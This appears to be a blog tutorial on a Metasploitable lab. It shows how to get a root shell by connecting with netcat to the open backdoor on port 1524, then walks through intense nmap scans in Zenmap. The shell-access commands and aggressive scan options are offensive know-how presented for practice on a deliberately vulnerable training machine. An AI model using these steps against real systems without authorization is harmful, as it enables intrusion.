Skip to main content

Explot Metasploitable Root shell

                             Metasploitable Root shell 1524/tcp             open                 shell              Metasploitable root shell This was a curiousity… My first attempt was to attempt using rlogin to connect to the port, which did not appear to work correctly, though did seem to work enough to return part of a prompt to the user: root@kali:~# rlogin -p 1524 target oot@metasploitable:/# My next approach was to attempt a simple netcat connection to the host, which ended up being successful: root@kali:~# nc -v target 1524 root@metasploitable:/# id              ...

scan By zenmap

Zenmap

Zenmap is the official graphical user interface (GUI) for the Nmap Security Scanner. It is a multi-platform, free and open-source application designed to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.



Step 2:
Type IP ADDRESS into Target and you can Choose scan option according to You

I have Chosen Manually Default Intense scan 

But You can choose anyone of these

  • Intense scan. Command: nmap -T4 -A -v <target> ...
  • Intense scan plus UDP. ...
  • Intense scan, all TCP ports. ...
  • Intense scan, no ping. ...
  • Ping scan. ...
  • Quick scan. ...
  • Quick scan plus. ...
  • Quick traceroute.

Step 3 :
After Selecting one of the press scan button/option 
pic1

Pic2

Pic3

Comments